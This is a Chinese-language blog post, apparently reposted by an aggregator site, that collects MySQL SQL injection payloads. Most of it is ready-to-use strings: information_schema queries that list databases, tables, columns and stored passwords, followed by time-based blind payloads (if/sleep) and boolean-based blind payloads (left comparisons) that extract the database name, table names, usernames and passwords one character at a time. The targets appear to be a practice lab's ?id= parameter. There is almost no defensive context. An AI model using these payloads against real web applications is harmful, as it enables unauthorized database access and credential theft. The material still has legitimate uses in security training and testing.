mysql注入语句
Posted dyanbk
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了mysql注入语句相关的知识,希望对你有一定的参考价值。
一、sql注入语句
爆破所有数据库:
(select group_concat(schema_name) from information_schema.schemata)获取数据库所有表:
(select group_concat(table_name) from information_schema.tables where table_schema='mysql')获取所有列名:
(select group_concat(column_name) from information_schema.columns where table_name='users')获取所有用户密码:
(select group_concat(password) from security.users)(select group_concat(username) from security.users)盲注
方法一:时间延迟型手工注入
1.爆库长
?id=1' and if(length(database())=8,sleep(5),1)--+ 明显延迟,数据库长度为8.
2.爆库名
?id=1' and if(left(database(),1)='s' ,sleep(5),1) --+?id=1' and if(left(database(),8)='security' ,sleep(5),1) --+明显延迟,数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确匹配时会延迟。最终爆破得到left(database(),8)=‘security‘
3.爆表名
?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(5),1) --+?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,2),1)='us' ,sleep(5),1) --+?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,5),1)='users' ,sleep(5),1) --+4.爆列名
?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+5.爆用户和密码
?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+注意:limit 按照id排序,limit 从0开始.
方法二,布尔型手工注入
在布尔型注入中,正确会回显,错误没有回显
1.爆库名
id=1' and length(database())=8--+?id=' and left((select database()),1)='s' --+?id=' and left((select database()),2)='se' --+2.爆表名
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+3.爆列名
?id=1'and left((select column_name from information_schema.columns where table_name='users'limit 2,1 ),8)='password' --+4.爆用户和密码
?id=1' and left((select username from users order by id limit 0,1),1)='d' --+?id=1' and left((select password from users order by id limit 0,1),1)='d' --+以上是关于mysql注入语句的主要内容,如果未能解决你的问题,请参考以下文章